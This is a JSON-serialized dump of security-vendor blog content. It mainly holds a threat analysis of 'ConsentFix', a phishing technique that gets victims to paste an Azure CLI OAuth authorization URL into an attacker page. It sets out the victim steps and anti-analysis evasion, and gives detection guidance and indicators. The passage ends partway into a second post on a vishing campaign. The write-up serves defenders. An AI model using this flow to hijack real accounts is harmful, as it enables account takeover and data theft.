ta":7693,"content":7694},{},[7695],{"nodeType":173,"value":1430,"marks":7696,"data":7697},[],{},{"nodeType":178,"data":7699,"content":7700},{},[7701],{"nodeType":173,"value":1437,"marks":7702,"data":7703},[],{},{"nodeType":178,"data":7705,"content":7706},{},[7707],{"nodeType":173,"value":1444,"marks":7708,"data":7709},[],{},{"nodeType":178,"data":7711,"content":7712},{},[7713,7716,7723,7726,7733],{"nodeType":173,"value":1451,"marks":7714,"data":7715},[],{},{"nodeType":186,"data":7717,"content":7718},{"uri":1456},[7719],{"nodeType":173,"value":1459,"marks":7720,"data":7722},[7721],{"type":194},{},{"nodeType":173,"value":1464,"marks":7724,"data":7725},[],{},{"nodeType":186,"data":7727,"content":7728},{"uri":1469},[7729],{"nodeType":173,"value":1472,"marks":7730,"data":7732},[7731],{"type":194},{},{"nodeType":173,"value":1477,"marks":7734,"data":7735},[],{},{"items":7737},[7738,7740],{"sys":7739,"name":505},{"id":504},{"sys":7741,"name":509},{"id":508},{"items":7743},[7744],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":7745},{"url":1496},{"__typename":1528,"sys":7747,"content":7749,"title":8598,"synopsis":8599,"hashTags":118,"publishedDate":8600,"slug":8601,"tagsCollection":8602,"authorsCollection":8608},{"id":7748},"71EaaK7lfl6bQBbkAU0qjv",{"json":7750},{"nodeType":165,"data":7751,"content":7752},{},[7753,7761,7768,7775,7782,7794,7801,7807,7813,7816,7824,7831,7838,7844,7864,7871,7877,7884,7890,7897,7940,7946,7952,7959,7966,7969,7977,7997,8004,8010,8028,8034,8054,8061,8064,8072,8079,8123,8135,8138,8146,8164,8171,8187,8194,8201,8207,8214,8217,8225,8232,8285,8292,8295,8303,8309,8316,8323,8329,8336,8369,8376,8383,8389,8396,8402,8410,8430,8437,8470,8477,8510,8513,8521,8528,8534,8553,8560,8586,8592],{"nodeType":169,"data":7754,"content":7755},{},[7756],{"nodeType":173,"value":7757,"marks":7758,"data":7760},"Introducing “ConsentFix” — a new kind of phishing attack",[7759],{"type":370},{},{"nodeType":178,"data":7762,"content":7763},{},[7764],{"nodeType":173,"value":7765,"marks":7766,"data":7767},"The Push browser agent recently detected and blocked a new attack technique seen targeting several Push customers. ",[],{},{"nodeType":178,"data":7769,"content":7770},{},[7771],{"nodeType":173,"value":7772,"marks":7773,"data":7774},"This is a new kind of browser-based attack technique that takes over user accounts with a simple copy and paste. If you’re already logged into the app in your browser, you don’t even need to supply creds, or pass an MFA check — meaning it effectively circumvents phishing-resistant auth like passkeys too.",[],{},{"nodeType":178,"data":7776,"content":7777},{},[7778],{"nodeType":173,"value":7779,"marks":7780,"data":7781},"This is so different from the AiTM phish kits we usually come up against that we felt it deserved a new name. ",[],{},{"nodeType":178,"data":7783,"content":7784},{},[7785,7790],{"nodeType":173,"value":7786,"marks":7787,"data":7789},"Enter: ConsentFix. ",[7788],{"type":370},{},{"nodeType":173,"value":7791,"marks":7792,"data":7793},"This attack shares a lot of similarities with ClickFix/FileFix, AiTM phishing, and OAuth Consent Phishing. You can think of this as a browser-native ClickFix attack that phishes an OAuth token on a target app by getting the victim to copy and paste a URL containing OAuth key material into a phishing page. ",[],{},{"nodeType":178,"data":7795,"content":7796},{},[7797],{"nodeType":173,"value":7798,"marks":7799,"data":7800},"The campaign we detected looks to be specifically targeting Microsoft accounts by abusing the Azure CLI OAuth app. Essentially, the attacker tricks the victim into logging into Azure CLI, by generating an OAuth authorization code — visible in a localhost URL — and then pasting that URL (including the code) into an attacker-controlled page. This then creates an OAuth connection between the victim’s Microsoft account and the attacker’s Azure CLI instance. ",[],{},{"nodeType":312,"data":7802,"content":7806},{"target":7803},{"sys":7804},{"id":7805,"type":317,"linkType":318},"5GTnqWIbmraz8HZeHMybrP",[],{"nodeType":312,"data":7808,"content":7812},{"target":7809},{"sys":7810},{"id":7811,"type":317,"linkType":318},"1lcjX5q3b1bsuhyOXKvJpW",[],{"nodeType":231,"data":7814,"content":7815},{},[],{"nodeType":169,"data":7817,"content":7818},{},[7819],{"nodeType":173,"value":7820,"marks":7821,"data":7823},"How ConsentFix works",[7822],{"type":370},{},{"nodeType":178,"data":7825,"content":7826},{},[7827],{"nodeType":173,"value":7828,"marks":7829,"data":7830},"In all of the examples we saw, the victim accessed a malicious or compromised webpage via Google Search. The vast majority of the sites we’ve seen associated with the campaign are legitimate, compromised websites with high domain reputation that are easily findable via search engines.",[],{},{"nodeType":178,"data":7832,"content":7833},{},[7834],{"nodeType":173,"value":7835,"marks":7836,"data":7837},"The attacker had injected a fake Cloudflare Turnstile into the compromised websites, requiring an email address to be supplied in order to proceed. ",[],{},{"nodeType":312,"data":7839,"content":7843},{"target":7840},{"sys":7841},{"id":7842,"type":317,"linkType":318},"39jEjeLqOYIkGc4o9w3MuX",[],{"nodeType":178,"data":7845,"content":7846},{},[7847,7851,7860],{"nodeType":173,"value":7848,"marks":7849,"data":7850},"This acted as a form of ",[],{},{"nodeType":186,"data":7852,"content":7854},{"uri":7853},"https://phishing-techniques.pushsecurity.com/techniques/conditional-loading/",[7855],{"nodeType":173,"value":7856,"marks":7857,"data":7859},"conditional loading",[7858],{"type":194},{},{"nodeType":173,"value":7861,"marks":7862,"data":7863}," that would only continue if a valid email address and domain was supplied, designed to prevent the page from being analysed by security bots, analysts, and low-value accounts that run the risk of exposing the campaign before the intended recipient(s) can be phished. ",[],{},{"nodeType":178,"data":7865,"content":7866},{},[7867],{"nodeType":173,"value":7868,"marks":7869,"data":7870},"If a domain not on the target list was provided, the victim was passed back to the original website and the attack did not progress to the next stage. Further, once the check has concluded per IP, the phishing page will no longer activate, even a different email is provided.  ",[],{},{"nodeType":312,"data":7872,"content":7876},{"target":7873},{"sys":7874},{"id":7875,"type":317,"linkType":318},"7ttmGnTzi9j87tBXfyFcOA",[],{"nodeType":178,"data":7878,"content":7879},{},[7880],{"nodeType":173,"value":7881,"marks":7882,"data":7883},"After entering an approved email address, the next stage was loaded, prompting the victim to complete a set of instructions on the page to continue.",[],{},{"nodeType":312,"data":7885,"content":7889},{"target":7886},{"sys":7887},{"id":7888,"type":317,"linkType":318},"2oHYNoMgAz6MdgLlcWjbaB",[],{"nodeType":178,"data":7891,"content":7892},{},[7893],{"nodeType":173,"value":7894,"marks":7895,"data":7896},"To complete the attack, the victim must:",[],{},{"nodeType":250,"data":7898,"content":7899},{},[7900,7910,7920,7930],{"nodeType":254,"data":7901,"content":7902},{},[7903],{"nodeType":178,"data":7904,"content":7905},{},[7906],{"nodeType":173,"value":7907,"marks":7908,"data":7909},"Click the “Sign In” button. This opens a new tab that loads a legitimate Microsoft URL associated with the user account/email used to access the page.",[],{},{"nodeType":254,"data":7911,"content":7912},{},[7913],{"nodeType":178,"data":7914,"content":7915},{},[7916],{"nodeType":173,"value":7917,"marks":7918,"data":7919},"If the user is already logged into Microsoft in their browser, they simply need to select their MS account from the dropdown. Otherwise, they will be required to login via the legitimate Microsoft login URL (no phishing takes place at this stage). ",[],{},{"nodeType":254,"data":7921,"content":7922},{},[7923],{"nodeType":178,"data":7924,"content":7925},{},[7926],{"nodeType":173,"value":7927,"marks":7928,"data":7929},"Once logged into legit Microsoft or the account is selected from the dropdown, the user is redirected to localhost, which generates a URL containing a code associated with the user’s Microsoft account. ",[],{},{"nodeType":254,"data":7931,"content":7932},{},[7933],{"nodeType":178,"data":7934,"content":7935},{},[7936],{"nodeType":173,"value":7937,"marks":7938,"data":7939},"To complete the phish, the victim copies the URL and pastes it onto the original page. ",[],{},{"nodeType":312,"data":7941,"content":7945},{"target":7942},{"sys":7943},{"id":7944,"type":317,"linkType":318},"7zendMbmCViGwtEpUQvq6y",[],{"nodeType":312,"data":7947,"content":7951},{"target":7948},{"sys":7949},{"id":7950,"type":317,"linkType":318},"1eZOs7hXi9FzCE92QEP6xh",[],{"nodeType":178,"data":7953,"content":7954},{},[7955],{"nodeType":173,"value":7956,"marks":7957,"data":7958},"Once the steps are completed, the victim has granted the attacker access to their Microsoft account via Azure CLI. ",[],{},{"nodeType":178,"data":7960,"content":7961},{},[7962],{"nodeType":173,"value":7963,"marks":7964,"data":7965},"At this point, the attacker has effective control of the victim’s Microsoft account, but without ever needing to phish a password, or pass an MFA check. In fact, if the user was already logged in to their Microsoft account (i.e. they had an active session) no login is required at all. ",[],{},{"nodeType":231,"data":7967,"content":7968},{},[],{"nodeType":169,"data":7970,"content":7971},{},[7972],{"nodeType":173,"value":7973,"marks":7974,"data":7976},"The next evolution of ClickFix?",[7975],{"type":370},{},{"nodeType":178,"data":7978,"content":7979},{},[7980,7984,7993],{"nodeType":173,"value":7981,"marks":7982,"data":7983},"When we presented ",[],{},{"nodeType":186,"data":7985,"content":7987},{"uri":7986},"https://pushsecurity.com/webinar/clickfix",[7988],{"nodeType":173,"value":7989,"marks":7990,"data":7992},"our last webinar on ClickFix",[7991],{"type":194},{},{"nodeType":173,"value":7994,"marks":7995,"data":7996},", we predicted that the next evolution of the attack would happen entirely within the browser context. This is because any attack that touches the endpoint (a traditionally much better protected surface) is way more likely to be detected. And with many ClickFix attacks being used to deliver infostealer malware, these attacks are really trying to get back into the browser anyway — to steal credentials and sessions stored there. ",[],{},{"nodeType":178,"data":7998,"content":7999},{},[8000],{"nodeType":173,"value":8001,"marks":8002,"data":8003},"Let’s take a closer look at the page — if you follow Push research, you might be getting déjà vu. ",[],{},{"nodeType":312,"data":8005,"content":8009},{"target":8006},{"sys":8007},{"id":8008,"type":317,"linkType":318},"1vMZCJ92IxFdR1EzzCOOvb",[],{"nodeType":178,"data":8011,"content":8012},{},[8013,8017,8025],{"nodeType":173,"value":8014,"marks":8015,"data":8016},"We’ve seen this kind of embedded video player before (albeit a slicker looking one) that we blogged about as ",[],{},{"nodeType":186,"data":8018,"content":8019},{"uri":1842},[8020],{"nodeType":173,"value":8021,"marks":8022,"data":8024},"the most advanced ClickFix we’d seen",[8023],{"type":194},{},{"nodeType":173,"value":1477,"marks":8026,"data":8027},[],{},{"nodeType":312,"data":8029,"content":8033},{"target":8030},{"sys":8031},{"id":8032,"type":317,"linkType":318},"ID7VKJNOZk729P5zBOBjZ",[],{"nodeType":178,"data":8035,"content":8036},{},[8037,8041,8050],{"nodeType":173,"value":8038,"marks":8039,"data":8040},"Another similarity with ClickFix campaigns we’ve investigated is the use of Google Search as a delivery vector. 4 in 5 ClickFix attacks intercepted by Push came via Google Search, with attackers using ",[],{},{"nodeType":186,"data":8042,"content":8044},{"uri":8043},"https://phishing-techniques.pushsecurity.com/techniques/malvertising/",[8045],{"nodeType":173,"value":8046,"marks":8047,"data":8049},"malvertising",[8048],{"type":194},{},{"nodeType":173,"value":8051,"marks":8052,"data":8053}," and either compromised or custom vibe-coded websites to intercept users as they browse the internet. ",[],{},{"nodeType":178,"data":8055,"content":8056},{},[8057],{"nodeType":173,"value":8058,"marks":8059,"data":8060},"So it seems highly likely that this is a kind of browser-native evolution of ClickFix that shares many elements with typical ClickFix attacks, and is probably used by the same groups of attackers.",[],{},{"nodeType":231,"data":8062,"content":8063},{},[],{"nodeType":169,"data":8065,"content":8066},{},[8067],{"nodeType":173,"value":8068,"marks":8069,"data":8071},"OAuth shenanigans via Azure CLI",[8070],{"type":370},{},{"nodeType":178,"data":8073,"content":8074},{},[8075],{"nodeType":173,"value":8076,"marks":8077,"data":8078},"The clever use of Azure CLI and OAuth consent abuse is another clever iteration on previous techniques. ",[],{},{"nodeType":178,"data":8080,"content":8081},{},[8082,8086,8095,8098,8106,8110,8119],{"nodeType":173,"value":8083,"marks":8084,"data":8085},"We’ve previously seen ",[],{},{"nodeType":186,"data":8087,"content":8089},{"uri":8088},"https://phishing-techniques.pushsecurity.com/techniques/consent-phishing/",[8090],{"nodeType":173,"value":8091,"marks":8092,"data":8094},"consent phishing",[8093],{"type":194},{},{"nodeType":173,"value":933,"marks":8096,"data":8097},[],{},{"nodeType":186,"data":8099,"content":8101},{"uri":8100},"https://phishing-techniques.pushsecurity.com/techniques/device-code-phishing/",[8102],{"nodeType":173,"value":1812,"marks":8103,"data":8105},[8104],{"type":194},{},{"nodeType":173,"value":8107,"marks":8108,"data":8109}," attacks where attackers have tricked victims into connecting malicious external apps into their tenant via OAuth, but this is becoming increasingly difficult in core enterprise cloud environments like Azure due to ",[],{},{"nodeType":186,"data":8111,"content":8113},{"uri":8112},"https://learn.microsoft.com/en-us/microsoft-365/admin/misc/user-consent?view=o365-worldwide",[8114],{"nodeType":173,"value":8115,"marks":8116,"data":8118},"stricter default configs",[8117],{"type":194},{},{"nodeType":173,"value":8120,"marks":8121,"data":8122},". However, since Azure CLI is a first-party Microsoft app, it is implicitly trusted in Entra ID, and is excluded from these restrictions. ",[],{},{"nodeType":178,"data":8124,"content":8125},{},[8126,8130],{"nodeType":173,"value":8127,"marks":8128,"data":8129},"First-party apps like Azure CLI are trusted by default in all tenants, allowed to request permissions without admin approval, and cannot be deleted or blocked. They can also be granted special permissions, such as tenant-wide service permissions (without needing admin approval), use of legacy or undocumented graph scopes, internal scopes for Microsoft client operations, and permissions for Office/Entra admin functions. ",[],{},{"nodeType":173,"value":8131,"marks":8132,"data":8134},"This makes Azure CLI a prime target for attackers, and significantly more exploitable than when connecting a third-party app. ",[8133],{"type":370},{},{"nodeType":231,"data":8136,"content":8137},{},[],{"nodeType":169,"data":8139,"content":8140},{},[8141],{"nodeType":173,"value":8142,"marks":8143,"data":8145},"Advanced detection evasion techniques",[8144],{"type":370},{},{"nodeType":178,"data":8147,"content":8148},{},[8149,8153,8160],{"nodeType":173,"value":8150,"marks":8151,"data":8152},"This campaign features some of the most advanced ",[],{},{"nodeType":186,"data":8154,"content":8155},{"uri":6820},[8156],{"nodeType":173,"value":8157,"marks":8158,"data":8159},"detection evasion techniques",[],{},{"nodeType":173,"value":8161,"marks":8162,"data":8163}," we've seen in the wild. ",[],{},{"nodeType":178,"data":8165,"content":8166},{},[8167],{"nodeType":173,"value":8168,"marks":8169,"data":8170},"As well as the use of Google Search to deliver the lure, and bot protection to prevent security tools from analysing the page, there were multiple layers of anti-analysis techniques to navigate.",[],{},{"nodeType":178,"data":8172,"content":8173},{},[8174,8178,8183],{"nodeType":173,"value":8175,"marks":8176,"data":8177},"We already mentioned the use of selective targeting based on email addresses and domain names. But all sites involved in the campaign also have synchronized IP blocking — meaning if you visit one site and are served one of the associated phishing pages, the phish will never be served again, ",[],{},{"nodeType":173,"value":8179,"marks":8180,"data":8182},"across any of the sites linked to the campaign",[8181],{"type":370},{},{"nodeType":173,"value":8184,"marks":8185,"data":8186},". When you visit any of the sites again, the phish won't trigger, and it can be browsed as normal. ",[],{},{"nodeType":178,"data":8188,"content":8189},{},[8190],{"nodeType":173,"value":8191,"marks":8192,"data":8193},"On the backend, there are multiple checks based on your IP and identifiers unique to your session. Unless all of the conditions are met, certain JavaScript packages won't be served — preventing full inspection of the page to detect malicious elements. ",[],{},{"nodeType":178,"data":8195,"content":8196},{},[8197],{"nodeType":173,"value":8198,"marks":8199,"data":8200},"If the conditions aren't met, the page may not load the Cloudflare Turnstile check at all, or will redirect you back to the site to continue browsing as normal.",[],{},{"nodeType":312,"data":8202,"content":8206},{"target":8203},{"sys":8204},{"id":8205,"type":317,"linkType":318},"5v0zDoscA6pYLBfkXrNtIH",[],{"nodeType":178,"data":8208,"content":8209},{},[8210],{"nodeType":173,"value":8211,"marks":8212,"data":8213},"All of these make it incredibly hard to detect and block these attacks ahead of time when relying on URL-based checks and traffic analysis.",[],{},{"nodeType":231,"data":8215,"content":8216},{},[],{"nodeType":169,"data":8218,"content":8219},{},[8220],{"nodeType":173,"value":8221,"marks":8222,"data":8224},"Key takeaways",[8223],{"type":370},{},{"nodeType":178,"data":8226,"content":8227},{},[8228],{"nodeType":173,"value":8229,"marks":8230,"data":8231},"ConsentFix is a dangerous evolution of ClickFix and consent phishing that is incredibly hard for traditional security tools to detect and block, as:",[],{},{"nodeType":250,"data":8233,"content":8234},{},[8235,8245,8255,8265,8275],{"nodeType":254,"data":8236,"content":8237},{},[8238],{"nodeType":178,"data":8239,"content":8240},{},[8241],{"nodeType":173,"value":8242,"marks":8243,"data":8244},"The attack happens entirely inside the browser context, removing one of the key detection opportunities for ClickFix (because it doesn’t touch the endpoint).",[],{},{"nodeType":254,"data":8246,"content":8247},{},[8248],{"nodeType":178,"data":8249,"content":8250},{},[8251],{"nodeType":173,"value":8252,"marks":8253,"data":8254},"Delivering the lure via a Google Search watering hole attack completely circumvents email-based anti-phishing controls.",[],{},{"nodeType":254,"data":8256,"content":8257},{},[8258],{"nodeType":178,"data":8259,"content":8260},{},[8261],{"nodeType":173,"value":8262,"marks":8263,"data":8264},"Targeting a first-party app like Azure CLI means that many of the mitigating controls available for third-party app integrations do not apply — making this attack way harder to prevent.",[],{},{"nodeType":254,"data":8266,"content":8267},{},[8268],{"nodeType":178,"data":8269,"content":8270},{},[8271],{"nodeType":173,"value":8272,"marks":8273,"data":8274},"Because there’s no login required, phishing-resistant authentication controls like passkeys have no impact on this attack. ",[],{},{"nodeType":254,"data":8276,"content":8277},{},[8278],{"nodeType":178,"data":8279,"content":8280},{},[8281],{"nodeType":173,"value":8282,"marks":8283,"data":8284},"The use of advanced detection evasion techniques makes this attack difficult to investigate, meaning these attacks are going undetected. ",[],{},{"nodeType":178,"data":8286,"content":8287},{},[8288],{"nodeType":173,"value":8289,"marks":8290,"data":8291},"We’re sure to see more examples of ConsentFix in future. We’ll be monitoring to see how attackers adapt in terms of integrating these capabilities with common as-a-Service offerings to make them more widespread, and whether the scope extends further beyond Microsoft / Azure CLI targets in the future to target other enterprise cloud ecosystems. ",[],{},{"nodeType":231,"data":8293,"content":8294},{},[],{"nodeType":169,"data":8296,"content":8297},{},[8298],{"nodeType":173,"value":8299,"marks":8300,"data":8302},"Recommendations",[8301],{"type":370},{},{"nodeType":312,"data":8304,"content":8308},{"target":8305},{"sys":8306},{"id":8307,"type":317,"linkType":318},"3aBCwdB2aNnLRxRN5RrshC",[],{"nodeType":178,"data":8310,"content":8311},{},[8312],{"nodeType":173,"value":8313,"marks":8314,"data":8315},"On the backend, exploitation of this attack will lead to login events being observed to the Microsoft Azure CLI app. It’s likely that any legitimate use of this will most likely be limited to system administrators and possibly developers. Therefore, logins outside of these groups will be inherently more suspicious.",[],{},{"nodeType":178,"data":8317,"content":8318},{},[8319],{"nodeType":173,"value":8320,"marks":8321,"data":8322},"Additionally, it’s possible that aspects of the logins themselves will be different between legitimate Azure CLI use and exploitation of this attack. For example, see the following logs from a lab environment. The login events with an application of  “Microsoft Azure CLI” and a resource of “Azure Resource Manager” was legitimate use of the Azure CLI using the powershell CLI framework. Conversely, the login event with the Resource of “Windows Azure Active Directory” was produced by logging in using the method used by the phishing kit.",[],{},{"nodeType":312,"data":8324,"content":8328},{"target":8325},{"sys":8326},{"id":8327,"type":317,"linkType":318},"6ie0nkk6XbgwidfwmiGwL4",[],{"nodeType":178,"data":8330,"content":8331},{},[8332],{"nodeType":173,"value":8333,"marks":8334,"data":8335},"There is no guarantee this can be used to differentiate between legitimate and malicious examples, but it’s another data point to consider. If searching logs you may wish to use the respective GUIDs for these:",[],{},{"nodeType":250,"data":8337,"content":8338},{},[8339,8354],{"nodeType":254,"data":8340,"content":8341},{},[8342],{"nodeType":178,"data":8343,"content":8344},{},[8345,8350],{"nodeType":173,"value":8346,"marks":8347,"data":8349},"Application ID",[8348],{"type":370},{},{"nodeType":173,"value":8351,"marks":8352,"data":8353}," = 04b07795-8ddb-461a-bbee-02f9e1bf7b46",[],{},{"nodeType":254,"data":8355,"content":8356},{},[8357],{"nodeType":178,"data":8358,"content":8359},{},[8360,8365],{"nodeType":173,"value":8361,"marks":8362,"data":8364},"Resource ID",[8363],{"type":370},{},{"nodeType":173,"value":8366,"marks":8367,"data":8368}," = 00000002-0000-0000-c000-000000000000",[],{},{"nodeType":178,"data":8370,"content":8371},{},[8372],{"nodeType":173,"value":8373,"marks":8374,"data":8375},"For interactive logins, like above, you cannot rely on looking for logins from suspicious IP addresses or locations. The login itself occurs from the victims browser directly to Microsoft, and so the IP addresses associated with these events will be the legitimate IP used by the target user, not by the threat actor. ",[],{},{"nodeType":178,"data":8377,"content":8378},{},[8379],{"nodeType":173,"value":8380,"marks":8381,"data":8382},"However, for non-interactive logins and other audit logs for actions taken, you may be able to uncover unusual IP addresses that differ from the original interactive login. For example, here are some non-interactive logins that were observed immediately after compromise that came from different IP addresses in both the US and Indonesia.",[],{},{"nodeType":312,"data":8384,"content":8388},{"target":8385},{"sys":8386},{"id":8387,"type":317,"linkType":318},"TD3YeWqgGIWIWM8FRHU4o",[],{"nodeType":178,"data":8390,"content":8391},{},[8392],{"nodeType":173,"value":8393,"marks":8394,"data":8395},"Interestingly, they differ in which resources they accessed, with one accessing the Windows Azure Active Directory resource ID like the interactive login, but two others accessing the Microsoft Intune Checkin resource ID. ",[],{},{"nodeType":312,"data":8397,"content":8401},{"target":8398},{"sys":8399},{"id":8400,"type":317,"linkType":318},"57PqDQiAiwzqkspVpROQXb",[],{"nodeType":235,"data":8403,"content":8404},{},[8405],{"nodeType":173,"value":8406,"marks":8407,"data":8409},"IoCs",[8408],{"type":370},{},{"nodeType":178,"data":8411,"content":8412},{},[8413,8417,8426],{"nodeType":173,"value":8414,"marks":8415,"data":8416},"Short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to ",[],{},{"nodeType":186,"data":8418,"content":8420},{"uri":8419},"https://phishing-techniques.pushsecurity.com/techniques/domain-rotation-redirection/",[8421],{"nodeType":173,"value":8422,"marks":8423,"data":8425},"quickly spin up and rotate the sites used",[8424],{"type":194},{},{"nodeType":173,"value":8427,"marks":8428,"data":8429}," in the attack chain, often dynamically serving different URLs to site visitors. ",[],{},{"nodeType":178,"data":8431,"content":8432},{},[8433],{"nodeType":173,"value":8434,"marks":8435,"data":8436},"That said, the domains used to deliver the final phishing payload were:",[],{},{"nodeType":250,"data":8438,"content":8439},{},[8440,8450,8460],{"nodeType":254,"data":8441,"content":8442},{},[8443],{"nodeType":178,"data":8444,"content":8445},{},[8446],{"nodeType":173,"value":8447,"marks":8448,"data":8449},"hxxps://trustpointassurance.com/",[],{},{"nodeType":254,"data":8451,"content":8452},{},[8453],{"nodeType":178,"data":8454,"content":8455},{},[8456],{"nodeType":173,"value":8457,"marks":8458,"data":8459},"hxxps://fastwaycheck.com/",[],{},{"nodeType":254,"data":8461,"content":8462},{},[8463],{"nodeType":178,"data":8464,"content":8465},{},[8466],{"nodeType":173,"value":8467,"marks":8468,"data":8469},"hxxps://previewcentral.com",[],{},{"nodeType":178,"data":8471,"content":8472},{},[8473],{"nodeType":173,"value":8474,"marks":8475,"data":8476},"In addition, we recommend hunting for connections from the following IPs in Azure logs:",[],{},{"nodeType":250,"data":8478,"content":8479},{},[8480,8490,8500],{"nodeType":254,"data":8481,"content":8482},{},[8483],{"nodeType":178,"data":8484,"content":8485},{},[8486],{"nodeType":173,"value":8487,"marks":8488,"data":8489},"12.75.216.90",[],{},{"nodeType":254,"data":8491,"content":8492},{},[8493],{"nodeType":178,"data":8494,"content":8495},{},[8496],{"nodeType":173,"value":8497,"marks":8498,"data":8499},"182.3.36.223",[],{},{"nodeType":254,"data":8501,"content":8502},{},[8503],{"nodeType":178,"data":8504,"content":8505},{},[8506],{"nodeType":173,"value":8507,"marks":8508,"data":8509},"12.75.116.137",[],{},{"nodeType":231,"data":8511,"content":8512},{},[],{"nodeType":169,"data":8514,"content":8515},{},[8516],{"nodeType":173,"value":8517,"marks":8518,"data":8520},"How Push stopped the attack",[8519],{"type":370},{},{"nodeType":178,"data":8522,"content":8523},{},[8524],{"nodeType":173,"value":8525,"marks":8526,"data":8527},"Even though this was a brand new technique, Push intercepted this attack and shut it down before customers could interact with it. ",[],{},{"nodeType":312,"data":8529,"content":8533},{"target":8530},{"sys":8531},{"id":8532,"type":317,"linkType":318},"5YzpiQH974EYA5iPPZMXkV",[],{"nodeType":178,"data":8535,"content":8536},{},[8537,8541,8549],{"nodeType":173,"value":8538,"marks":8539,"data":8540},"Push doesn’t detect the redirect tricks or rely on outdated domain TI feeds. The reason we detect these attacks (which make it through all the other layers of phishing protection) is that Push sees what your users see. It doesn’t matter what ",[],{},{"nodeType":186,"data":8542,"content":8543},{"uri":6820},[8544],{"nodeType":173,"value":8545,"marks":8546,"data":8548},"delivery channel or camouflage methods are used",[8547],{"type":194},{},{"nodeType":173,"value":8550,"marks":8551,"data":8552},", Push shuts the attack down in real time, as the user loads the malicious page in their web browser.",[],{},{"nodeType":178,"data":8554,"content":8555},{},[8556],{"nodeType":173,"value":8557,"marks":8558,"data":8559},"This isn’t all we do: Push’s browser-based security platform provides comprehensive detection and response capabilities against the leading cause of breaches. Push blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, and session hijacking. You don’t need to wait until it all goes wrong — you can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack surface.",[],{},{"nodeType":178,"data":8561,"content":8562},{},[8563,8566,8573,8576,8583],{"nodeType":173,"value":1451,"marks":8564,"data":8565},[],{},{"nodeType":186,"data":8567,"content":8568},{"uri":1456},[8569],{"nodeType":173,"value":1459,"marks":8570,"data":8572},[8571],{"type":194},{},{"nodeType":173,"value":1464,"marks":8574,"data":8575},[],{},{"nodeType":186,"data":8577,"content":8578},{"uri":1469},[8579],{"nodeType":173,"value":1472,"marks":8580,"data":8582},[8581],{"type":194},{},{"nodeType":173,"value":1477,"marks":8584,"data":8585},[],{},{"nodeType":312,"data":8587,"content":8591},{"target":8588},{"sys":8589},{"id":8590,"type":317,"linkType":318},"6QzB0BlVC5mstXwXHvy2c3",[],{"nodeType":178,"data":8593,"content":8594},{},[8595],{"nodeType":173,"value":37,"marks":8596,"data":8597},[],{},"ConsentFix: Analysing a browser-native ClickFix-style attack that hijacks OAuth consent grants","Analysing \"ConsentFix\", a new browser-native attack technique we've detected in the wild, combining OAuth consent phishing with a ClickFix-style user prompt. ","2025-12-11T00:00:00.000Z","consentfix",{"items":8603},[8604,8606],{"sys":8605,"name":505},{"id":504},{"sys":8607,"name":509},{"id":508},{"items":8609},[8610],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":8614},"Luke Jennings","Luke","Vice President, R&D",{"url":8615},"https://images.ctfassets.net/y1cdw1ablpvd/4Hosb4zKi1dA0PUyDLMe1h/27e09d894861f2196ba794037986fb08/T016S22KZ96-U02NVQM7ZD4-57761d542d83-512.jpeg",{"__typename":1528,"sys":8617,"content":8619,"title":9225,"synopsis":9226,"hashTags":118,"publishedDate":9227,"slug":9228,"tagsCollection":9229,"authorsCollection":9235},{"id":8618},"44DXq5ZkL9XQV5Fngto0XZ",{"json":8620},{"nodeType":165,"data":8621,"content":8622},{},[8623,8640,8647,8654,8657,8665,8685,8704,8738,8744,8747,8755,8763,8770,8788,8795,8800,8806,8813,8820,8828,8835,8842,8848,8855,8875,8883,8890,8897,8917,8923,8941,8947,8954,8960,8963,8971,8978,8997,9004,9032,9039,9047,9050,9058,9065,9072,9078,9085,9130,9136,9143,9175,9181,9219],{"nodeType":178,"data":8624,"content":8625},{},[8626,8629,8636],{"nodeType":173,"value":37,"marks":8627,"data":8628},[],{},{"nodeType":186,"data":8630,"content":8631},{"uri":5002},[8632],{"nodeType":173,"value":6811,"marks":8633,"data":8635},[8634],{"type":194},{},{"nodeType":173,"value":8637,"marks":8638,"data":8639}," are running a large-scale hybrid vishing plus AiTM phishing campaign across several industry verticals, targeting Okta, Entra, and Google SSO platforms. ",[],{},{"nodeType":178,"data":8641,"content":8642},{},[8643],{"nodeType":173,"value":8644,"marks":8645,"data":8646},"The attacks begin with the attacker calling their victim, impersonating IT staff from their company. They offer to help the employee set up passkeys for logging into the enterprise SSO service, tricking the victim into visiting a specially crafted adversary-in-the-middle phishing site that captures their SSO credentials, MFA codes, and ultimately live session access. ",[],{},{"nodeType":178,"data":8648,"content":8649},{},[8650],{"nodeType":173,"value":8651,"marks":8652,"data":8653},"Once an account is stolen, the attacker logs in to the SSO dashboard to see which platforms they have access to and then proceeds to steal data from them — with the ultimate goal of extorting victims. ",[],{},{"nodeType":231,"data":8655,"content":8656},{},[],{"nodeType":169,"data":8658,"content":8659},{},[8660],{"nodeType":173,"value":8661,"marks":8662,"data":8664},"What we know",[8663],{"type":370},{},{"nodeType":178,"data":8666,"content":8667},{},[8668,8672,8681],{"nodeType":173,"value":8669,"marks":8670,"data":8671},"To date, ",[],{},{"nodeType":186,"data":8673,"content":8675},{"uri":8674},"https://www.silentpush.com/blog/slsh-alert/",[8676],{"nodeType":173,"value":8677,"marks":8678,"data":8680},"100+ companies have been targeted",[8679],{"type":194},{},{"nodeType":173,"value":8682,"marks":8683,"data":8684},", with infrastructure and domains impersonating their brand to be used in legit-looking campaigns against them. The reality is that the list of targets could be more extensive, and will continue to increase over time. ",[],{},{"nodeType":178,"data":8686,"content":8687},{},[8688,8692,8700],{"nodeType":173,"value":8689,"marks":8690,"data":8691},"SLH ",[],{},{"nodeType":186,"data":8693,"content":8694},{"uri":926},[8695],{"nodeType":173,"value":8696,"marks":8697,"data":8699},"claims to be using data stolen in previous breaches",[8698],{"type":194},{},{"nodeType":173,"value":8701,"marks":8702,"data":8703},", such as the widespread Salesforce data theft attacks reported in 2025, to identify and contact employees. This data includes phone numbers, job titles, names, and other details used to make the social engineering calls more convincing.",[],{},{"nodeType":178,"data":8705,"content":8706},{},[8707,8711,8716,8720,8725,8729,8734],{"nodeType":173,"value":8708,"marks":8709,"data":8710},"The group recently relaunched its Tor data leak site, which currently lists breaches at 